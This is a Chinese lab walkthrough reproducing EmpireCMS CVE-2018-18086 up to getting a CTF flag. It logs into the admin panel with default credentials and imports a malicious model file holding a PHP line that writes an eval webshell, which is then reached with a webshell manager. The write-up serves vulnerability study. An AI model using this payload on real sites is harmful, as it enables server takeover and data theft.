一、漏洞描述

EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件。

二、影响版本

EmpireCMS<=7.5

三、漏洞复现

  1. 进入靶场,登入后台 http://ip/empirecms/e/admin/,账号/密码:admin/123456。

系统->管理数据表->导入系统模型

2.上传*.php.mod文件,填写空格内容,选择马上导入,并确认:

<?php file_put_contents("sh3ll.php","<?php @eval(\$_POST[cmd]); ?>");?>

3.访问下看有没有成功解析

4.webshell管理工具连接http://ip/empirecms/e/admin/shell.php 密码cmd。

5.获取flag

empirecms 文件上传 (CVE-2018-18086)相关推荐

  1. 帝国cms empirecms 文件上传 (CVE-2018-18086)复现

    所有文章,仅供安全研究与学习之用,后果自负! 这里写目录标题 empirecms 文件上传 (CVE-2018-18086) 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 0x04 漏洞 ...

  2. empirecms 文件上传 (CVE-2018-18086)漏洞复现

    1.漏洞详情 EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS). EmpireCMS 7.5版本中的e/class/moddofun.php文件的'LoadInMod'函数存在安全漏 ...

  3. php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞

    事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...

  4. java使用Jsch实现远程操作linux服务器进行文件上传、下载,删除和显示目录信息...

    1.java使用Jsch实现远程操作linux服务器进行文件上传.下载,删除和显示目录信息. 参考链接:https://www.cnblogs.com/longyg/archive/2012/06/2 ...

  5. 使用FUSE挖掘文件上传漏洞

    关于FUSE FUSE是一款功能强大的渗透测试安全工具,可以帮助广大研究人员在最短的时间内迅速寻找出目标软件系统中存在的文件上传漏洞. FUSE本质上是一个渗透测试系统,主要功能就是识别无限制可执行文 ...

  6. Ajax(form表单文件上传、请求头之contentType、Ajax传递json数据、Ajax文件上传)

    form表单文件上传 上菜 file_put.html <form action="" method="post" enctype="multi ...

  7. [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  8. servlet实现文件上传,预览,下载和删除

    一.准备工作 1.1 文件上传插件:uploadify: 1.2 文件上传所需jar包:commons-fileupload-1.3.1.jar和commons-io-2.2.jar 1.3 将数据转 ...

  9. HTML文件上传与下载

    文件下载 传统的文件下载有两种方法: 使用<a/>标签,href属性直接连接到服务器的文件路径 window.location.href="url" 这两种方法效果一样 ...

最新文章

  1. Python和xml简介
  2. 去掉数组最后一个元素_leetcode 34. 在排序数组中查找元素的第一个和最后一个位置每天刷一道leetcode算法系列!...
  3. 我的世界末日求生系列服务器,末日生存 少年pi
  4. 解析几何复习(一)向量代数
  5. linux 网卡命令 mtu,Linux网络命令
  6. 训练网络时如何加入噪声_[模型量化] 如何训练一个“耐量化”的网络?
  7. no symbol version section for versioned symbol `memcpy@GLIBC_2.4'
  8. 每日工作记录——状态机的编码选择
  9. 百度智能云开物凭什么在“双跨”新增名单中排名榜首?
  10. 专访探索AGI的孤勇者,传奇工程师John Carmack:惊讶看不到如我这样的人
  11. 为什么要做特征归一化/标准化?
  12. 如何极速盘点海量固定资产?
  13. [Mysql] CONCAT函数 | CONCAT_WS函数
  14. Mac 配置教程-日常篇
  15. windows arm linux,Windows服务器搭载ARM,人生大赢家不是微软而是Linux
  16. 萝莉状态栏android4.4,教你如何让Windows 7任务栏功能更丰富
  17. 邀请媒体参加活动的邀请函应该怎么写
  18. 康奈尔大学计算机科学研究生,美国研究生留学 康奈尔大学计算机科学申请要求...
  19. 游戏FreeType字体
  20. 自动化实现携程预约抢票

热门文章

  1. 高新技术企业认定的指标要求
  2. 如何修改服务器root密码,服务器root密码修改
  3. 移动开发之百度地图导航及定位
  4. 如何找到电影的下载链接
  5. 【c#操作小技巧】发送电子邮件
  6. 七牛云实时音视频通话集成
  7. 利用qt打开一张图片并转成灰度矩阵
  8. 旧android手机当播放器,android手机立即变无线移动终端播放器 Qloud media 详细教程...
  9. linux命名信号量,在进程之间使用POSIX信号量(命名信号量,Linux,C)
  10. 站长说说之做seo优化赚钱吗?到底该如何做?